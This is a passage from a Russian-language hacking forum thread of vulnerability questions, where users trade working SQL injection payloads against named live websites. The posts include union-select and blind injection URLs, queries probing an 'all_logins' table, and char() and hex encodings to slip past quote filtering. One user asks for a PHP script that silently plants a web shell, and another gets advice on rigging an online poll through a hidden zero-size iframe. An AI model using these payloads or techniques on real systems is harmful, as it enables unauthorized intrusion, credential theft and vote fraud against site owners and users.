Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Code:
    http://www.nostalgiatv.ru/418/?id=1287+order+by+5+--
    Подал число. При попытке сделать
    Code:
    http://www.nostalgiatv.ru/418/?id=-1+uion+select+1,2,3,4,5+--
    пишет 33Ошибка выполнения запроса на сервере =(
    Что не так?
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Нужен скриптик на пхп
    Чтобы когда зашол на страницу то заметно заливался шелл на сайт
    путь до сайта знаю
     
    #5662 diznt, 3 Mar 2009
    Last edited: 3 Mar 2009
  3. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Ни как не могу реализировать подбор:
    _http://www.granadocafe.com/index.php?option=com_fireboard&Itemid=209'
     
  4. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 wildshaman
    слепая
    Code:
    http://www.nostalgiatv.ru/418/?id=22+and+ascii(lower(substring((version()),1,1)))=52--+
    4 версия
    на слово "select" походу фильтр идет ;/
     
    #5664 0nep@t0p, 3 Mar 2009
    Last edited: 3 Mar 2009
    1 person likes this.
  5. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    это форум ... ты ничего не сможешь там сделать
     
  6. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    ну и что, что форум... скуль же есть
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Та слешируються кавычки а без кавычки ты нифига не сделаешь
     
    1 person likes this.
  8. VIP

    VIP Elder - Старейшина

    Joined:
    29 Dec 2004
    Messages:
    104
    Likes Received:
    3
    Reputations:
    0
    Может быть это не совсем по теме, но новый топик создавать не хочется, дабы не засорять форум пустяковым вопросом ламера.

    Так вот. На определённом сайтике есть опрос, где нужно "продвинуть" один из вариантов ответа. Так как голосовать на сайте можно из инета (всмысле из всего инета, а не из сетки), но так как с одного адреса (скорее всего IP) многоразовое голосование блокируется, то идея вобщем баяновская: создать страничку в сети не по теме, где во фрейме нулевого размера шла бы переадресация на этот опрос с нужным вариантом ответа (типа чел там ответил). Но вот проблема заключается в том, что я не знаю как этот вариант ответа передаётся. Как это можно выяснить?
     
  9. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    firefox - tamper data,http fox, и множество сниферов, выберай сам, но имхо легче и быстрее через прокси крутить.
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Можно сформировать просто страничку которая будет передовать пораметры голосования POST или GET, ты можешь это посмотреть на форме голосования какая переменная передаются какому скрипту и каким методом, а потом на сформированую страничку просто лей трафик и всё...
     
    _________________________
  11. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Firefox Http Headers
    Php Curl
    Iframe
     
  12. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    AkyHa_MaTaTa>> ну ти прав на що того что кавычки слешыруюца.. но насколько помню есть обход.. я вот только прызабыл где то я ето видел вот и выклал скуль чтоб ктото может поможет).
     
  13. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20information_schema.columns%20WHERE%20TABLE_NAME='all_logins')--
    1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20information_schema.columns%20WHERE%20TABLE_NAME=char(97)+char(108)+char(108)+char(95)+char(108)+char(111)+char(103)+char(105)+char(110)+char(115))--
    как решить?)
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Micr0b:

    есть, например %27, но тогда нет ошибки mysql, т.е. ошибку можно вызвать только когда кавычка в чистом виде, нет ошибки - нет скули

    ЗЫЖ По идее:)
     
    #5674 Pashkela, 3 Mar 2009
    Last edited: 3 Mar 2009
  15. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Pashkela
    если ты это мне то 1+or+1=@@version выводит
    вывел все таблицы а столбцы не получается из за выше написанного(
    а скуль это внедрение и выполнение sql-кода) а не ошибки выполнение скрипта)
    зы. вроде правильно)
     
  16. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    up
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Чарить надо так:

    char(97)%2Bchar(108)%2Bchar(108)%2Bchar(95)%2Bchar(108)%2Bchar(111)%2Bchar(103)%2Bchar(105)%2Bchar(110)%2Bchar(115)
     
    1 person likes this.
  18. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2R1dex
    спс) работает) а для общего развития можешь обьяснить почему так "заработало"?)
     
  19. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Просто + в урле - это пробел, %2B - это +
    --------
    Лудше переводи в число (в твоем случае - 0x616c6c205f6c6f67696e73) - так короче запрос получается
     
    #5679 BlackSun, 3 Mar 2009
    Last edited: 3 Mar 2009
    1 person likes this.
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Ты толком можешь объяснить? Через что заливать? Инъекция? Файл_прив включен? Толку с того, что путь знаешь...
     
Thread Status:
Not open for further replies.